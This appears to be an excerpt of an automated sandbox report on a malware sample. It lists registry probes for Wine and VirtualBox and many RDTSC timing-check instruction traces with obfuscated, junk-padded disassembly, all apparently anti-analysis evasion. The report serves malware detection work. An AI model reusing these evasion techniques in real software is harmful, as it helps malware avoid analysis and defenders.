Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2018 second address: 5B201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B201C second address: 5B2022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2022 second address: 5B2030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA6C4C2AB38h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B2030 second address: 5B2035 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B22C5 second address: 5B22CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B241F second address: 5B242B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DD8 second address: 5B5DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DDC second address: 5B5DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DE0 second address: 5B5DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DE6 second address: 5B5DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DEB second address: 5B5DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5DFB second address: 5B5E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4D39096h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E1F second address: 5B5E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E2F second address: 5B5E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E34 second address: 5B5E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6C4C2AB45h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E65 second address: 5B5E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5F15 second address: 5B5F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6021 second address: 5B6091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FA6C4D39094h 0x0000000e nop 0x0000000f call 00007FA6C4D39091h 0x00000014 mov esi, dword ptr [ebp+122D2961h] 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D25B2h], edi 0x00000025 mov ecx, 0C71D491h 0x0000002a popad 0x0000002b pop edx 0x0000002c call 00007FA6C4D39089h 0x00000031 ja 00007FA6C4D3909Ch 0x00000037 jmp 00007FA6C4D39096h 0x0000003c push eax 0x0000003d pushad 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6091 second address: 5B609A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B609A second address: 5B60D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FA6C4D39099h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jl 00007FA6C4D3909Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4D3908Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B60D4 second address: 5B6144 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jng 00007FA6C4C2AB42h 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA6C4C2AB38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000003h 0x00000031 or edx, dword ptr [ebp+122D2B8Dh] 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D1DE3h] 0x0000003f push 00000003h 0x00000041 mov edi, eax 0x00000043 push 9E7D6B5Ch 0x00000048 pushad 0x00000049 jo 00007FA6C4C2AB3Ch 0x0000004f jc 00007FA6C4C2AB36h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B61BB second address: 5B61DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D29ADh] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D1E12h], edi 0x00000017 push 00D677CBh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B61DC second address: 5B6247 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA6C4C2AB38h 0x0000000c popad 0x0000000d xor dword ptr [esp], 00D6774Bh 0x00000014 add di, 5B97h 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA6C4C2AB38h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 add dword ptr [ebp+122D246Fh], esi 0x0000003b mov ch, al 0x0000003d push 00000000h 0x0000003f movsx edx, di 0x00000042 push 00000003h 0x00000044 jmp 00007FA6C4C2AB3Dh 0x00000049 adc dl, 00000020h 0x0000004c call 00007FA6C4C2AB39h 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6247 second address: 5B628F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FA6C4D39095h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push ecx 0x00000018 jp 00007FA6C4D39086h 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA6C4D39092h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B628F second address: 5B6293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6293 second address: 5B631E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39099h 0x0000000c jmp 00007FA6C4D39090h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jno 00007FA6C4D39092h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FA6C4D39095h 0x00000024 pop eax 0x00000025 mov esi, dword ptr [ebp+122D2975h] 0x0000002b lea ebx, dword ptr [ebp+12459D29h] 0x00000031 xchg eax, ebx 0x00000032 jbe 00007FA6C4D3908Eh 0x00000038 push ecx 0x00000039 jg 00007FA6C4D39086h 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA6C4D3908Dh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B57 second address: 5D5B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B6C second address: 5D5B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4D39099h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D399D second address: 5D39A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D3FB2 second address: 5D3FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D3FB6 second address: 5D3FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D42B3 second address: 5D42D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Ch 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA6C4D39086h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D45FF second address: 5D4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4603 second address: 5D4607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4607 second address: 5D4613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4613 second address: 5D4622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4622 second address: 5D4628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4628 second address: 5D463B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jnc 00007FA6C4D39086h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47A1 second address: 5D47A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47A6 second address: 5D47AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47AE second address: 5D47B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47B2 second address: 5D47EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Dh 0x00000007 je 00007FA6C4D39086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA6C4D39099h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jp 00007FA6C4D390A4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47EE second address: 5D47F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC46 second address: 5CAC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6C4D39096h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC62 second address: 5CAC72 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC72 second address: 5CAC76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5404 second address: 5D5416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA6C4C2AB36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D570E second address: 5D5732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 jnl 00007FA6C4D39086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D59D3 second address: 5D59D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8089 second address: 5D808F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02B6 second address: 5A02BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02BA second address: 5A02C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02C7 second address: 5A02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02CD second address: 5A02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02D1 second address: 5A02FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FA6C4C2AB36h 0x0000000d jmp 00007FA6C4C2AB45h 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007FA6C4C2AB36h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02FC second address: 5A030F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Eh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E138C second address: 5E13B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FA6C4C2AB52h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E13B3 second address: 5E13C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E154F second address: 5E1555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1555 second address: 5E155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E155B second address: 5E1587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4C2AB3Ah 0x0000000a pop edi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4C2AB47h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1587 second address: 5E158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E158B second address: 5E158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E16BD second address: 5E16C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1C49 second address: 5E1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1C4D second address: 5E1C5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3AD8 second address: 5E3ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3BCB second address: 5E3BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3D72 second address: 5E3D88 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jp 00007FA6C4C2AB36h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3E59 second address: 5E3E70 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4D3908Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3E70 second address: 5E3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3F35 second address: 5E3F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3F3A second address: 5E3F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3FD5 second address: 5E3FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA6C4D39086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA6C4D3908Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3FED second address: 5E3FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4480 second address: 5E44EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6C4D39086h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov dword ptr [esp], eax 0x0000000f add edi, dword ptr [ebp+122D2ADDh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FA6C4D39088h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6C4D39088h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d push ebx 0x0000004e movzx esi, di 0x00000051 pop esi 0x00000052 push eax 0x00000053 jnp 00007FA6C4D39090h 0x00000059 pushad 0x0000005a push eax 0x0000005b pop eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D10 second address: 5E4D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E56CF second address: 5E56DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D14 second address: 5E4D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6C4C2AB43h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FA6C4C2AB3Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EA4 second address: 5E5EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EA8 second address: 5E5EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EAC second address: 5E5EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EB2 second address: 5E5EBC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4C2AB3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
